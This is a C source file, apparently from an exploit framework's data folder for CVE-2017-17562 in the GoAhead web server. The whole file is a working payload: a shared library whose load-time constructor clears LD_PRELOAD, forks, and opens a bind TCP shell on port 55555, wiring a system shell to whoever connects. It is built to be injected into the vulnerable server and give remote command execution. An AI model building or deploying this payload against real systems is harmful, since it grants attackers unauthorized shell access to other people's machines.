data/exploits/CVE-2017-17562/goahead-cgi-bind.c
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/in.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#ifdef OLD_LIB_SET_1
__asm__(".symver system,system@GLIBC_2.0");
__asm__(".symver fork,fork@GLIBC_2.0");
#endif
#ifdef OLD_LIB_SET_2
__asm__(".symver system,system@GLIBC_2.2.5");
__asm__(".symver fork,fork@GLIBC_2.2.5");
#endif
static void _bind_tcp_shell(void) {
int sfd, fd, i;
struct sockaddr_in addr,saddr;
unsigned int saddr_len = sizeof(struct sockaddr_in);
char *lport = "55555";
char *shells[] = {
"/bin/bash",
"/usr/bin/bash",
"/bin/sh",
"/usr/bin/sh",
"/bin/ash",
"/usr/bin/ash",
"/bin/dash",
"/usr/bin/dash",
"/bin/csh",
"/usr/bin/csh",
"/bin/ksh",
"/usr/bin/ksh",
"/bin/busybox",
"/usr/bin/busybox",
NULL
};
sfd = socket(AF_INET, SOCK_STREAM, 0);
setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &(int){ 1 }, sizeof(int));
saddr.sin_family = AF_INET;
saddr.sin_port = htons(atoi(lport));
saddr.sin_addr.s_addr = INADDR_ANY;
bzero(&saddr.sin_zero, 8);
if (bind(sfd, (struct sockaddr *) &saddr, saddr_len) == -1) {
exit(1);
}
if (listen(sfd, 5) == -1) {
close(sfd);
exit(1);
}
fd = accept(sfd, (struct sockaddr *) &addr, &saddr_len);
close(sfd);
if (fd == -1) {
exit(1);
}
for (i=0; i<3; i++) {
dup2(fd, i);
}
/* Keep trying until execl() succeeds */
for (i=0; ; i++) {
if (shells[i] == NULL) break;
execl(shells[i], "sh", NULL);
}
/* Close the connection if we failed to find a shell */
close(fd);
}
static void _run_payload_(void) __attribute__((constructor));
static void _run_payload_(void)
{
unsetenv("LD_PRELOAD");
if (! fork())
_bind_tcp_shell();
exit(0);
}